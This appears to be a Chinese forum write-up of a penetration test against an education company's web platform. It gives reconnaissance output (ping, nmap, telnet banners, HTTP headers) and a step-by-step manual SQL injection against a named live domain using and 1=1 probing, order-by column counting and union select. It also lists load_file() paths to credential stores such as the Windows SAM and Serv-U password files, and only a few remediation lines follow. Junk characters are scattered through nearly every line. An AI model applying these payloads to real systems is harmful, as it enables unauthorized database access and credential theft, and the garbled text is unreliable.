题记:8 B" z8 p# r& s% u
一位朋友在某教育公司,一套网络教育平台。一年前,在2008年8月份的时候,我看到了这套平台,当时发现了个注入漏洞,测试了一下,得到一个可用帐户后就没有再继续下去。今天7月,又说到此事,我决定继续下去……
`. z* Q4 S& e8 q. S$ X! f第一步:获取需要的信息2 s: a9 u- ~) W* G) @
由于之前测试过,知道此系统某处存在SQL注入漏洞。但由于时隔一年,岁月的远去已经深深的隐藏了那个SQL注入漏洞的地址,现在需要重新收集服务器有用信息。- f8 D* P; V% ~ i0 O2 J8 k0 Z
注:以下为保护特用XXX代替敏感信息
& C, }# J7 x, X, d顺手先PING了一下他们的域名:$ ]2 k' T0 F' H: l+ x8 L
ping XXX.XXX.XXX.XXX(本文约定:用XXX.XXX.XXX.XXX代表测试IP和域名)! S3 F5 n0 g0 C( Y2 M, O
64 bytes from *********: icmp_seq=1 ttl=246 time=1.87 ms
3 G3 o6 ? i6 \* s2 w, w {顺便了解一下TTL,学好基础知识才能一路顺风:' f) N# }6 @* ?* O5 t- W6 u1 v$ g7 }# _
TTL:(Time To Live ) 生存时间* H+ k$ Q9 I, ?# B. d% i
指定数据包被路由器丢弃之前允许通过的网段数量。9 f E. f$ h5 n
TTL 是由发送主机设置的,以防止数据包不断在 IP 互联网络上永不终止地循环。转发 IP 数据包时,要求路由器至少将 TTL 减小 1。
# {$ R, L: B/ h5 o9 k' G7 b( F使用PING时涉及到的 ICMP 报文类型& p: r+ ]. ~. h# a* [; e0 {1 z, d p
一个为ICMP请求回显(ICMP Echo Request)4 A4 {, a4 u3 c6 {7 S6 a! D
一个为ICMP回显应答(ICMP Echo Reply)% J+ H# h& I3 R5 C, W
TTL 字段值可以帮助我们识别操作系统类型。
" |# `1 B6 [# k9 W, o. P; uUNIX 及类 UNIX 操作系统 ICMP 回显应答的 TTL 字段值为 255
. l' Z; w3 i2 R. U. a% E" V; L% `Compaq Tru64 5.0 ICMP 回显应答的 TTL 字段值为 64
0 z; |3 z# @; H( J( N: f9 h微软 Windows NT/2K操作系统 ICMP 回显应答的 TTL 字段值为 128, k/ L* j5 P7 b& B
微软 Windows 95 操作系统 ICMP 回显应答的 TTL 字段值为 32+ }; E. o: x6 D: D; f2 u
当然,返回的TTL值是相同的
^) w0 h4 {6 Q; W$ s但有些情况下有所特殊
4 ~6 `1 e0 v5 K# R$ CLINUX Kernel 2.2.x & 2.4.x ICMP 回显应答的 TTL 字段值为 641 h6 A. P+ X, F# |7 H+ I" d
FreeBSD 4.1, 4.0, 3.4;
: I% } x+ }5 }* g2 RSun Solaris 2.5.1, 2.6, 2.7, 2.8;7 T( }- E6 w) m! h) `# r
OpenBSD 2.6, 2.7,9 `& g4 M2 N' q% f2 E
NetBSD
4 V: `; }8 X' n+ F! Z8 ?+ HHP UX 10.20
" z, ?# N; y) s. s- i. iICMP 回显应答的 TTL 字段值为 255
3 Z5 b9 K) E3 z; Q ?2 r$ ?Windows 95/98/98SE
! J! [% b9 H' S, V$ v- T) V; j" uWindows ME
9 g: j0 D; l% X5 cICMP 回显应答的 TTL 字段值为 323 R5 j9 ]8 T/ e4 y# n
Windows NT4 WRKS
- \4 l; S, W% ~9 I. F% H6 u2 iWindows NT4 Server/ E- h8 M, k0 Q) c
Windows 2000
H6 Q$ B; k; [8 TWindows XP
! H1 t+ _; o( f7 B# D) F: o8 @2 w( FICMP 回显应答的 TTL 字段值为 128% Z* I' B4 r. ` g
这样,我们就可以通过这种方法来辨别操作系统
! u: g+ _2 w% FTTL值的注册表位置HKEY_LOCAL_MACHINE\SYSTEM \CurrentControlSet\Services\Tcpip\Parameters 其中有个DefaultTTL的DWORD值,其数据就是默认的TTL值了,我们可以修改,但不能大于十进制的255
- p/ s: L1 @5 _$ i' N6 H8 {用NMAP扫描一下:& @2 L4 p+ K6 R& h8 z8 ~
nmap -sT -O XXX.XXX.XXX.XXX2 m9 T3 r: j% x0 ^1 }3 w
如果没有装WinPcap则会弹出提示:
) |% ?. k5 w' J# i& HWARNING: Could not import all necessary WinPcap functions. You may need to upgr
: m* J* X& ^" I; u5 wade to version 3.1 or higher from http://www.winpcap.org. Resorting to connect(# O5 q" X: g, `* i" |
) mode — Nmap may not function completely
1 q# C, o8 t# ^ }3 {) @2 m0 PTCP/IP fingerprinting (for OS scan) requires that WinPcap version 3.1 or higher9 _ k8 ]& z( H$ ]
and iphlpapi.dll be installed. You seem to be missing one or both of these. Win
6 }5 _6 P" E% q& c, upcap is available from http://www.winpcap.org. iphlpapi.dll comes with Win98 an
3 H/ \. y0 E- U: I7 ad later operating sytems and NT 4.0 with SP4 or greater. For previous windows v% r0 ~' o! f$ t* \9 W. g
ersions, you may be able to take iphlpapi.dll from another system and place it i
" d, j" n6 N1 |9 e, C1 R* Yn your system32 dir (e.g. c:\windows\system32).% j+ D2 I" k8 s$ } L
QUITTING!0 q1 y1 U$ R8 m6 _
到这里下载: http://www.winpcap.org/install/bin/WinPcap_4_1_1.exe7 y- v3 W a& |5 G
安装后继续执行刚才的命令,等待扫描完毕后得到入下信息:
8 F& k9 p' a2 E9 v" H7 ^% z2 AInteresting ports on XXX.XXX.XXX.XXX:$ |# ?5 k7 T! w9 Q x; G1 j" {
Not shown: 986 closed ports
% I+ u: ~3 h1 ~* hPORT STATE SERVICE8 \! K9 ~8 O0 l
21/tcp open ftp6 O- o* A1 F x' J6 _+ L$ U
22/tcp open ssh
/ `* \; V& a) h% o& h8 J( o23/tcp open telnet7 N5 B% a& K" M( ^% M5 w
80/tcp open http2 h. d6 ~" L& c6 H, x, [& _0 L9 h
111/tcp open rpcbind) c* P) j& }. X4 X M
135/tcp filtered msrpc
4 [ |' s; X8 D, }+ e, [139/tcp filtered netbios-ssn9 U; I; M, W8 l% t. B0 _ d" J
445/tcp filtered microsoft-ds2 L: c. ]; ?$ U, ?
513/tcp open login# @ {7 S( w& V' T7 \5 S
514/tcp open shell9 Z( u9 @. K% J3 F) x& s( P
593/tcp filtered http-rpc-epmap
# m6 l' y" [) `1 Y! X: g1 O% j' K, c. f1720/tcp filtered H.323/Q.9313 L" X8 E4 M4 m: {( f4 d
3306/tcp open mysql0 Z$ f- q. p% ~7 `0 f
4444/tcp filtered krb524; I) {6 j/ \: t; R' k" c2 A
Device type: WAP. U6 n- ]; ?7 }( r `9 N: P# q
Running: Linux 2.4.X
. a$ R) A& X V- q, w+ }OS details: DD-WRT (Linux 2.4.35s)
4 |6 c& d2 S7 E( f$ PNetwork Distance: 13 hops# c2 d, y3 L5 ^6 K" Y7 v( X
看到SSH22端口是开着的,打开putty试一下,看是否可以正常连接:
! u9 P+ _3 V8 o X7 Clogin as:
0 \2 L* Y( i) }5 Z+ ^+ pTelnet23端口也是开着的,用telnet 命令链接一下:
3 t$ t/ B8 }9 Ltelnet XXX.XXX.XXX.XXX! m1 m; [% b. |7 N, c, z
提示:
& B8 D1 j; \* L* [Red Hat Enterprise Linux Server release 5.2 (Tikanga). o n, F1 U, u) ~# A+ a
Kernel 2.6.18-92.el5PAE on an i686
/ W( ?$ u3 _0 T$ Y3 h& w: h2 o" m0 Alogin:- Z% M8 o5 O1 U- }
获取HTTP头信息:& o& Z8 G- T5 G! \
在本地执行如下PHP代码
& K- C$ ~' H& \, p6 p$ `7 D<?php
: e, k: F4 C( X) E9 ?$url = ‘XXX.XXX.XXX.XXX’;
+ i! B2 \3 q2 G' ^print_r(get_headers($url));4 T2 e' v: x+ p* b; A! P; z: R# ?2 {
print_r(get_headers($url, 1));
3 i) ~$ W' I! I& x3 Y% j?>
# `* _+ x1 Z) l8 ?2 l" V3 s将以上代码保存为PHP文件,执行:
! H# H% C; ?2 z0 \3 s2 m; X/ xArray ( [0] => HTTP/1.1 200 OK [1] => Server: nginx/0.7.61 [2] => Date: Mon, 02 Nov 2009 09:06:48 GMT [3] => Content-Type: text/html; charset=gb2312,gbk,utf-8 [4] => Content-Length: 75 [5] => Last-Modified: Thu, 20 Aug 2009 19:35:37 GMT [6] => Connection: close [7] => Accept-Ranges: bytes ) Array ( [0] => HTTP/1.1 200 OK [Server] => nginx/0.7.61 [Date] => Mon, 02 Nov 2009 09:06:48 GMT [Content-Type] => text/html; charset=gb2312,gbk,utf-8 [Content-Length] => 75 [Last-Modified] => Thu, 20 Aug 2009 19:35:37 GMT [Connection] => close [Accept-Ranges] => bytes )# x# V, [. J$ f1 x
现在可以得出结论:& Y9 l5 l1 I0 t, S. e( Q
系统版本:Red Hat Enterprise Linux Server release 5.2 (Tikanga)1 b% W+ X& }! B; f6 s% P
内核版本:Kernel 2.6.18-92.el5PAE on an i686$ [# M8 \4 K2 W) T
WEB服务器版本:nginx/0.7.61. H; V: [9 g. j4 N: ^2 W2 p; r
第二步,开始测试寻找漏洞# N; `' B; {) I; l5 ?
分析是否存在注入漏洞,因为上次曾发现存在过,所以注入则是我们的首选。
- @& s1 D$ V; v- }1、敏感地址:站内存在有类似:http://www.fovweb.com/XXX.php?id=123 这种地址,属动态传参的
, x d" i9 d; P0 I! a( P" ?, Z2、测试方法:在地址后加 and 1=1 和 and 1=2 测试/ B% A D) r$ Y- _2 Z
http://www.fovweb.com/XXX.php?id=123 and 1=1 返回正常
* H1 |! Q0 Y8 q2 b9 K# l- shttp://www.fovweb.com/XXX.php?id=123 and 1=2 返回错误% d" V9 i7 H: H6 J: r& N
恭喜,两次返回结果不同,则很有可能存在未过滤敏感字符而存在SQL注入漏洞,我们继续9 B4 [" ?" z2 U0 r4 z7 V9 c% b
3、手工注入:) @) R0 t t- I- p
注入也应该有个思路,不能随便碰运气,要记住入侵检测不是靠运气而走下去的,要靠的是清晰的思路、过硬的技术、很全的知识面。8 r3 T3 ]9 v; p7 i% M$ r
3.1 猜测当前表字段数; r' a8 {$ n Y+ A7 }
http://www.fovweb.com/XXX.php?id=123 and 1=1 order by 10
" E+ T) ~) x6 Z/ w2 g此处猜测有个简单的算法,都是有技巧的吗,呵呵
) D! I1 G5 }9 K7 C& h算法简单如下:
i* T% P5 v+ ^4 x4 ] H第一步:根据页面信息,大概估算一个数值,这个是要靠一定的经验了;
% H* |4 R" v/ g/ B' a第二步:取中算法,好比是10,如果返回错误,则取中间值5进行下一次猜测;+ s- \; l# ?: Z- A3 n
需要注意:如果所选数值在字段数范围内即小于等于,则会(返回正常);如果所选数值在字段范围外即大于等于,则会(返回错误)。
; H! l& U6 w" g以此来判断,是否过界,配合取中算法猜出字段数。% n& R9 k, P/ k+ v! p) p
举例:
; w# e4 ~! f$ x @7 Uhttp://www.fovweb.com/XXX.php?id=123 and 1=1 order by 3 返回正常
! d6 `( r H5 f, e9 Y& I6 Lhttp://www.fovweb.com/XXX.php?id=123 and 1=1 order by 4 返回错误6 I, @% L! p6 ^
此时3则为我们要找的字段数。
" I/ G' ]$ `& d# s3.2 配合union联合查询字段在页面所位置
5 z' W3 }# F+ q, K" g. @) N我们已经知道了字段数为3,此时则可以做如下操作:
6 ^: M$ C$ ]! p% j' ehttp://www.fovweb.com/XXX.php?id=123 and 1=2 union select 1,2,3
1 n0 O. m4 `; \0 s1 t0 r* V% f; T# f E" ~) q& E- j
这样就可以测试到哪些字段在页面上有所显示了,如图:0 L; w8 z- p |- t) _
6 v6 K; m/ O8 a, s, f! m- I3.3 查敏感信息) a0 u% C' V& X- X$ X6 C
这也是个思路问题,我们需要什么,其实到了这一步已经能做什么多事情了。( [+ l, z& O) ^0 J) [
http://www.fovweb.com/XXX.php?id=123 and 1=2 union select 1,user(),database()
6 i: ], v0 _5 R% p- @3.3.1 先查数据库用户、数据库名,以备后用,如图:
2 I% W Y& u. V4 z5 q- {+ T" u' ]* b# a
得到数据库用户为root、数据库名为DBxx;
. b% ^( r, G8 F% `3.3.2 查配置文件" W9 X6 ^& I( f# H9 P( G. R5 b
查配置文件,就是指查看系统敏感的文件,如web服务器配置文件等。
$ ?- O' q; l. s9 A" b7 P查看文件有一定的条件限制:& S1 S! \2 R* C
欲读取文件必须在服务器上& S* E8 ~# w% i" }4 g( {" ]) |
必须指定文件完整的路径
$ M8 h7 Y3 k% Y必须有权限读取并且文件必须完全可读0 E' q6 C. a0 f7 c& W" g& C
欲读取文件必须小于 max_allowed_packet: W7 U7 d; ]2 U$ C# m {: P4 q
MYSQL注入中,load_file()函数在获得webshell以及提权过程中起着十分重要的作用,常被用来读取各种配置文件。3 K" O: n: U& q
常用的一些:
/ Q. p% \+ I9 b2 j/ \: M s+ }5 \# E/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件- R$ Q H$ u! I! w; t
/usr/local/apache2/conf/httpd.conf4 E( e9 Q% H# K
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
% p* p) f7 B/ N `6 J/ n# D- a/usr/local/app/php5/lib/php.ini //PHP相关设置9 n+ d: u; w: }
/etc/sysconfig/iptables //从中得到防火墙规则策略% {5 W; \: |7 N6 C. }
/etc/httpd/conf/httpd.conf // apache配置文件
. m# m K7 j" d R/ _5 M1 F/etc/rsyncd.conf //同步程序配置文件3 {: k/ p) ]9 p# T! q5 `& f9 v
/etc/sysconfig/network-scripts/ifcfg-eth0 //查看IP.
2 W/ x2 U9 b0 R+ c! `2 ~, x; r/etc/my.cnf //mysql的配置文件/ V. s2 g+ j# Q% E% z, R8 Z7 A
/etc/redhat-release //系统版本8 q1 R1 [1 ~! v
/etc/issue6 q3 P4 U5 F7 B# a
/etc/issue.net. F# U7 m+ W; _5 W3 F3 [
c:\mysql\data\mysql\user.MYD //存储了mysql.user表中的数据库连接密码& ?% c; r2 L {- y
c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini //存储了虚拟主机网站路径和密码
; D. ]- B& l- a, Qc:\Program Files\Serv-U\ServUDaemon.ini
/ Z3 a' F) I% o5 Z! F- b/ R# g% ]$ Ic:\windows\my.ini //MYSQL配置文件
4 |# a# `* D. O9 k4 ?# Fc:\windows\system32\inetsrv\MetaBase.xml //IIS配置文件
8 F, R6 c/ J) L* M等等。实际上,load_file()的作用不止于此,它还可以用来读取系统中的二进制文件,2 e7 b9 H. U6 ~9 G( n" m& c3 W
c:\windows\repair\sam //存储了WINDOWS系统初次安装的密码7 x8 N/ d% V8 D# ]7 n
c:\Program Files\ Serv-U\ServUAdmin.exe //6.0版本以前的serv-u管理员密码存储于此! l( A6 G% P6 u) K& _; o) ~, [. c+ i
c:\Program Files\RhinoSoft.com\ServUDaemon.exe: l2 Y' \: G+ e
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件# \ h$ K; Y# l
//存储了pcAnywhere的登陆密码
- j4 A: `# @+ W/ E由于之前得到信息,此台服务器是采用的nginx做的Web服务器,那我们就来试着找一下nginx的安装路径吧。6 K4 e, K7 C0 b) r
这个没有技术性可言,纯靠经验和运气,由于很少用nginx不了解,我就先到网上搜索常用的安装路径,以及比较好的配置文档中的安装路径进行测试,最终,得到nginx安装路径“/usr/local/nginx/conf/nginx.conf”。
$ f, n' P7 S4 c* z最后:防范措施* Y* w* E5 I; J4 W' s- Z
1、修复PHP注入漏洞; A, ^: v0 z5 K2 X' i3 d
2、Mysql使用普通权限的用户;
a5 J" Z" R, a7 w# Q: I, D3、升级linux内核至最新版本; |